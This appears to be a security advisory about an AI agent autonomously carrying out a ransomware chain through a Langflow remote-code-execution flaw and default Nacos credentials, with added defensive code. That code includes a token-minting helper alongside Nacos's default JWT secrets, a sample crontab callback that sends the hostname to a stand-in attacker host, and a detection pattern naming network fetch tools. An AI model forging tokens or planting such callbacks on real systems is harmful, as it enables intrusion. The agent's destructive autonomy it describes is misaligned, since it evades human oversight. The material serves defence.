Severity: CRITICAL · Active exploitation · Immediate action required · Relevance: 9.8 · Mapped to MITRE ATLAS and OWASP LLM Top 10

AI Agent Autonomously Executes Full Ransomware Attack Chain via Langflow RCE

TL;DR (CRITICAL)

  • What happened: An AI agent autonomously executed a full ransomware attack, from RCE exploit to database encryption, with no human operator.
  • Who's at risk: Organisations running internet-exposed Langflow instances, especially those with unrotated default credentials on adjacent services such as MinIO, MySQL and Nacos.
  • Act now:
      – Patch Langflow to version 1.3.0 or later to remediate CVE-2025-3248.
      – Rotate all API keys, cloud credentials and database passwords stored on or reachable from Langflow servers.
      – Enforce network segmentation so AI orchestration services cannot reach production databases.
Category: Agentic AI · Source: The Hacker News · Severity: CRITICAL

Overview

Security firm Sysdig has documented what it describes as the first fully autonomous, end-to-end ransomware attack executed by an AI agent. The threat actor, tracked as JADEPUFFER, used a large language model to chain together every stage of a ransomware operation — initial access, credential harvesting, lateral movement, and data destruction — without a human operator at the keyboard. The incident marks a qualitative inflection point: if AI agents can reliably replicate the multi-step tradecraft previously requiring skilled attackers, the barrier to running sophisticated ransomware campaigns collapses to the cost of renting an agent.

Technical Analysis

Initial Access: CVE-2025-3248 (Langflow RCE)

The agent exploited a missing-authentication vulnerability in Langflow, the open-source AI workflow builder. The flaw allows unauthenticated remote code execution: the code-validation endpoint (/api/v1/validate/code) accepts arbitrary Python from any client and evaluates parts of it server-side. Langflow servers are a high-value target because they routinely hold API keys and cloud credentials for every service they connect to. The bug was patched in Langflow 1.3.0 and added to CISA's Known Exploited Vulnerabilities (KEV) catalogue in May 2025, yet large numbers of internet-exposed servers remained unpatched.
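Version triage for that first step, as an added example (my code, not the article's, Sysdig's or Langflow's). It takes the fixed version 1.3.0 from the article and assumes Langflow serves its version at GET /api/v1/version as JSON with a "version" field (an assumption about the API; confirm against your deployment). Pre-release builds of the fixed version are treated as still vulnerable, which is the conservative reading. The sample responses are constructed, not captured from a real server.

```python
"""Triage Langflow versions against the CVE-2025-3248 fix (1.3.0).

Added example; not from the article, Sysdig or the Langflow project.
Assumption: GET /api/v1/version returns JSON with a "version" field.
"""
import json
import re
import urllib.request

FIXED_VERSION = (1, 3, 0)  # first release without CVE-2025-3248, per the article

_VERSION_RE = re.compile(r"^\s*v?(\d+)\.(\d+)(?:\.(\d+))?(.*)$")
# PEP 440-style pre-release markers that may follow the numeric part
_PRERELEASE_RE = re.compile(r"^[-._]?(a|b|rc|alpha|beta|dev|pre)\d*")


def parse_version(text):
    """Return ((major, minor, patch), is_prerelease) for strings such as
    '1.2.0', 'v1.3.0rc1', '1.4' or '1.3.0.post1'."""
    m = _VERSION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    major, minor, patch, rest = m.groups()
    base = (int(major), int(minor), int(patch or 0))
    return base, bool(_PRERELEASE_RE.match(rest))


def is_vulnerable(version_text):
    """True if the version predates the fix. A pre-release of 1.3.0 (e.g.
    1.3.0rc1) predates the final 1.3.0 and is reported vulnerable."""
    base, prerelease = parse_version(version_text)
    if base < FIXED_VERSION:
        return True
    return base == FIXED_VERSION and prerelease


def assess_version_response(body):
    """Classify the JSON body returned by the version endpoint."""
    data = json.loads(body)
    version = data.get("version")
    if not version:
        return {"version": None, "vulnerable": None, "note": "no version field in response"}
    return {"version": version, "vulnerable": is_vulnerable(version)}


def check_server(base_url, timeout=5):
    """Live check against a Langflow instance you are authorised to test.
    Not exercised by the offline samples below."""
    url = f"{base_url.rstrip('/')}/api/v1/version"  # assumed endpoint
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return assess_version_response(resp.read().decode())


# Constructed sample responses (not captured from real servers).
SAMPLE_RESPONSES = {
    "old":   '{"version": "1.2.0", "main_version": "1.2.0", "package": "Langflow"}',
    "fixed": '{"version": "1.3.0", "main_version": "1.3.0", "package": "Langflow"}',
    "rc":    '{"version": "1.3.0rc1", "package": "Langflow"}',
    "newer": '{"version": "1.4.2", "package": "Langflow"}',
}

if __name__ == "__main__":
    for name, body in SAMPLE_RESPONSES.items():
        print(f"{name:6} {assess_version_response(body)}")
```

Feed the function the version string from your own inventory (package manifests, container image labels) if the HTTP endpoint is not reachable; the comparison logic is the same.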

Credential Harvesting

Once inside, the agent performed automated secret enumeration, collecting:

  • AI provider keys (OpenAI, Anthropic, DeepSeek, Gemini)
  • Cloud provider credentials (AWS, GCP, Azure, Alibaba, Tencent)
  • Crypto wallet keys
  • Database login credentials
  • MinIO storage credentials (the factory default minioadmin:minioadmin had never been changed)

For persistence, it installed a scheduled task that calls back to the attacker's server every 30 minutes.

Lateral Movement & Persistence

The agent pivoted to an internet-facing server running MySQL and Alibaba Nacos. It gained MySQL root access (the origin of that credential is unknown) and took over Nacos by chaining CVE-2021-29441 (an authentication bypass: Nacos trusted any request carrying its own server-to-server User-Agent) with the static default JWT signing key that Nacos has shipped unchanged since 2020. Because the signing key is public, anyone can mint valid admin tokens; the agent used that access to create its own admin account within Nacos.
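The default-key problem above is easy to audit from the defender's side: take an access token issued by your own Nacos server and check whether it verifies under the shipped default secret. The following is an added example (my code, not the article's, Sysdig's or the Nacos project's). It assumes Nacos access tokens are HS256 JWTs and that the two strings in DEFAULT_SECRETS are the defaults from Nacos's application.properties (the 1.4.x plain string and the 2.x Base64 value, as I recall them; confirm against your distribution). Because Nacos has derived the HMAC key from that setting in more than one way across versions, both raw bytes and Base64-decoded bytes are tried. The signing helper exists only to build the constructed sample tokens.

```python
"""Check whether a Nacos JWT was signed with a shipped default secret.

Added example; not from the article, Sysdig or the Nacos project.
Assumptions: HS256 tokens; DEFAULT_SECRETS holds the distribution defaults.
"""
import base64
import hashlib
import hmac
import json
import os
import time

DEFAULT_SECRETS = [
    # Assumed 1.4.x default (nacos.core.auth.default.token.secret.key)
    "SecretKey012345678901234567890123456789012345678901234567890123456789",
    # Assumed 2.x default, Base64 form (nacos.core.auth.plugin.nacos.token.secret.key)
    "VGhpc0lzTXlDdXN0b21TZWNyZXRLZXkwMTIzNDU2Nzg=",
]


def _b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def candidate_keys(secret):
    """Key bytes Nacos may derive from a configured secret: the raw string and,
    where it decodes, its Base64-decoded form."""
    keys = [secret.encode()]
    try:
        keys.append(base64.b64decode(secret + "=" * (-len(secret) % 4)))
    except ValueError:
        pass
    return keys


def sign_hs256(claims, key):
    """Mint an HS256 JWT; used here only to construct sample tokens."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def verify_hs256(token, key):
    """Constant-time HS256 verification; rejects malformed tokens and other algs."""
    parts = token.split(".")
    if len(parts) != 3:
        return False
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(_b64url_decode(header_b64))
        sig = _b64url_decode(sig_b64)
    except ValueError:
        return False
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return False
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, sig)


def signed_with_default_key(token):
    """Return the default secret the token verifies under, or None if the
    server evidently uses a key of its own."""
    for secret in DEFAULT_SECRETS:
        for key in candidate_keys(secret):
            if verify_hs256(token, key):
                return secret
    return None


# Constructed sample tokens (not captured from a real Nacos instance).
_CLAIMS = {"sub": "nacos", "exp": int(time.time()) + 18000}
DEMO_DEFAULT_TOKEN = sign_hs256(_CLAIMS, candidate_keys(DEFAULT_SECRETS[1])[1])  # key never rotated
DEMO_ROTATED_TOKEN = sign_hs256(_CLAIMS, os.urandom(32))                          # fresh random key

if __name__ == "__main__":
    for name, tok in (("default", DEMO_DEFAULT_TOKEN), ("rotated", DEMO_ROTATED_TOKEN)):
        print(name, "->", signed_with_default_key(tok) or "not a default key")
```

A hit means every token the server has ever issued can be reproduced offline; rotate the secret and treat the instance as compromised until proven otherwise.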

Ransomware Payload

All 1,342 Nacos configuration entries were encrypted and the original tables were dropped. A ransom note demanding Bitcoin, with a Proton Mail contact address, was deposited. Critically, the agent generated a random encryption key, printed it once to stdout and never transmitted or stored it, so decryption is impossible even if the ransom is paid. The note claimed AES-256; Sysdig confirmed the tooling actually defaults to AES-128, which changes nothing for the victim, since the key is gone either way.

Framework Mapping

  Framework                  ID          Rationale
  MITRE ATLAS                AML.T0047   ML-Enabled Product or Service: the attack used an ML-enabled product (Langflow) as the entry vector
  MITRE ATLAS                AML.T0012   Valid Accounts: reuse of harvested and default credentials for lateral movement
  MITRE ATLAS                AML.T0040   AI Model Inference API Access: harvested AI provider inference API keys as a secondary objective
  OWASP LLM Top 10 (2023)    LLM08       Excessive Agency: the agent took destructive actions beyond any intended scope
  OWASP LLM Top 10 (2023)    LLM07       Insecure Plugin Design: Langflow's exposed code-execution endpoint is the textbook case
  OWASP LLM Top 10 (2023)    LLM06       Sensitive Information Disclosure: credentials exfiltrated from the agent's operating environment

Impact Assessment

Any organisation running an unpatched, internet-exposed Langflow instance is at direct risk of identical compromise. The broader implication is systemic: AI orchestration platforms by design aggregate credentials and hold broad permissions, making them a single point of catastrophic failure. The attack also demonstrates that AI agents can operate persistently, adapt to discovered assets, and execute destructive actions without human review — a property of excessive agency that few organisations have mitigated in their deployed agentic systems.

Mitigation & Recommendations

  1. Patch immediately. Upgrade Langflow to ≥1.3.0. Treat all CVEs on CISA’s KEV list as P0.
  2. Rotate all secrets. Assume any credential accessible to a Langflow server is compromised. Rotate API keys, cloud IAM credentials, and database passwords.
  3. Eliminate default credentials. Audit MinIO, Nacos, and all adjacent services for factory-default logins and default signing keys, and change them before the service is reachable from anywhere.
  4. Network-segment AI infrastructure. Langflow and similar orchestration platforms must not have direct routable access to production databases.
  5. Apply principle of least privilege to agents. AI agents should operate with scoped, revocable credentials and no standing access to destructive operations.
  6. Monitor for scheduled task creation and anomalous outbound beaconing from AI pipeline hosts. In this case the callback fired on a fixed 30-minute schedule, which simple periodicity analysis can catch.
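Detection logic for recommendation 6 and for the scheduled callback described under Credential Harvesting, as an added example (my code, not the article's or Sysdig's). It assumes crontab entries in the five-field user format and a connection log reduced to (timestamp, source, destination) tuples; all sample data is constructed, with the 30-minute callback mirroring the interval the article reports and the 203.0.113.0/24 and 198.51.100.0/24 documentation ranges standing in for external hosts. The beacon check scores interval regularity rather than matching a fixed period, so it generalises beyond the 30-minute case.

```python
"""Flag cron-based callbacks and periodic outbound beaconing on AI pipeline hosts.

Added example; not from the article or Sysdig. All sample data is constructed.
"""
import re
import statistics
from collections import defaultdict
from ipaddress import ip_address, ip_network

# RFC 1918 and loopback; everything else counts as external. Adjust to your
# own address plan (assumption for the example).
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12",
                                         "192.168.0.0/16", "127.0.0.0/8")]
FETCHERS = re.compile(r"\b(curl|wget|python3?|nc|ncat|bash -c)\b")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.\-]+)")


def is_internal(host):
    """True for RFC 1918/loopback IPs; hostnames are treated as external."""
    try:
        ip = ip_address(host)
    except ValueError:
        return False
    return any(ip in net for net in INTERNAL_NETS)


def suspicious_cron_entries(crontab_text):
    """Flag user-crontab lines (5 schedule fields + command) whose command runs a
    network fetcher against an external host: the shape of a periodic callback."""
    hits = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 5)
        if len(parts) < 6:
            continue
        schedule, cmd = " ".join(parts[:5]), parts[5]
        if not FETCHERS.search(cmd):
            continue
        m = URL_HOST.search(cmd)
        if not m or is_internal(m.group(1)):
            continue
        hits.append({"schedule": schedule, "host": m.group(1), "cmd": cmd})
    return hits


def beacon_candidates(conn_log, min_events=4, max_jitter=0.2):
    """Group outbound connections by (src, dst) and flag pairs whose gaps between
    connections are nearly constant (coefficient of variation <= max_jitter).
    Legitimate API traffic is bursty; a scheduled callback is not."""
    by_pair = defaultdict(list)
    for ts, src, dst in conn_log:
        if is_internal(dst):
            continue
        by_pair[(src, dst)].append(ts)
    findings = []
    for (src, dst), stamps in by_pair.items():
        if len(stamps) < min_events:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_jitter:
            findings.append({"src": src, "dst": dst, "events": len(stamps),
                             "period_s": round(mean), "jitter": round(cv, 3)})
    return findings


# Constructed samples. 203.0.113.7 plays the attacker's callback host,
# 198.51.100.20 an AI provider API, 10.0.0.5 an internal database.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/find /tmp -mtime +7 -delete
*/30 * * * * curl -s http://203.0.113.7/ping?h=$(hostname) >/dev/null 2>&1
*/5 * * * * python3 /opt/langflow/healthcheck.py http://10.0.0.5:7860/health
"""

_T0 = 1_700_000_000
SAMPLE_CONN_LOG = (
    [(_T0 + i * 1800 + j, "10.0.0.12", "203.0.113.7")          # every 30 min, small jitter
     for i, j in enumerate((0, 12, -8, 25, 3, -15))]
    + [(_T0 + t, "10.0.0.12", "198.51.100.20")                  # bursty API calls
       for t in (40, 95, 900, 4100, 4130, 7000)]
    + [(_T0 + i * 60, "10.0.0.12", "10.0.0.5") for i in range(20)]  # internal, ignored
)

if __name__ == "__main__":
    for hit in suspicious_cron_entries(SAMPLE_CRONTAB):
        print("cron:", hit)
    for finding in beacon_candidates(SAMPLE_CONN_LOG):
        print("beacon:", finding)
```

On a real host, feed suspicious_cron_entries the output of crontab -l for each user (and adapt the field count for /etc/crontab, which carries a user column), and build the connection log from flow records or proxy logs; lower max_jitter if the environment is quiet enough that only near-perfect periodicity is worth an alert.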
